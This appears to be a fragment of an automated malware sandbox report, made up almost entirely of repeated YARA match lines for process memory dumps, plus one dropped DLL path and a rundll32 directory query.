Source: Yara match File source: 0000000E.00000002.551254560.00000000026E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.513222322.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.512899048.0000000000A41000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.594132166.0000000000901000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.512928569.0000000000AB0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.551495876.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.551115923.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.660299054.0000000002D10000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.428970111.0000000000590000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.551161049.0000000000A51000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.659831488.00000000009C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.512996042.00000000024B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.475400290.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.475156348.0000000002E11000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.660327240.0000000002D91000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.474851812.0000000000690000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.512498870.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.593877639.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.513150958.0000000003080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.659758879.0000000000961000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.551542350.0000000003131000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.660266694.0000000002C61000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.594377793.0000000002880000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.594111922.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.477681405.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.597604576.0000000010001000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.553407188.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.475233428.0000000002EA0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.477468433.0000000000811000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.553477687.0000000000231000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.513084856.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.513119737.0000000002F11000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.551016676.0000000000880000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.551292521.0000000002750000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.594180055.00000000009C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.594421745.00000000028B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.512955437.0000000000BF1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.474984528.0000000002680000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.596897580.0000000000130000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.475306327.0000000003100000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.515660080.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.659477991.0000000000361000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.594540165.0000000003031000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.475077072.0000000002821000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.551587623.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.594153605.0000000000930000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.474880932.00000000007B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.660127341.0000000002840000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.551064488.00000000008B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.475179519.0000000002E40000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.659519643.00000000005C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.594076623.0000000000891000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.660086465.0000000002461000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.512644490.0000000000441000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.659432268.0000000000330000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.474916407.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.475367351.0000000003131000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.550663447.0000000000221000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.475133854.0000000002DE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.662795416.0000000010001000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.597182512.0000000000231000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.660160297.0000000002901000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.658914705.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.513030492.0000000002531000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.475267140.0000000002ED1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.660227992.0000000002B30000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.594635198.00000000030E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.475043970.0000000002770000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.475004428.00000000026B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.550603107.0000000000190000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.594481069.0000000002E40000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.551207015.00000000023D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.551387065.0000000002850000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.515365273.0000000000290000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.515468825.00000000006F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.553700748.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.551322248.0000000002781000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.429058076.0000000001F71000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.477225934.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.593923730.0000000000300000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.594575357.0000000003060000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.551422656.0000000002921000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.512441171.0000000000170000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.594724619.0000000010001000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.512674317.0000000000470000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.593897086.0000000000211000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.513180019.0000000003101000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.659987477.0000000000A91000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.512601527.0000000000410000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.659040226.0000000000301000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.475202470.0000000002E71000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.474954492.00000000025A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.429100383.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\Public\Documents\ssd.dll, type: DROPPED
Source: C:\Windows\SysWOW64\rundll32.exe Directory queried: C:\Users\Public\Documents Jump to behavior
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs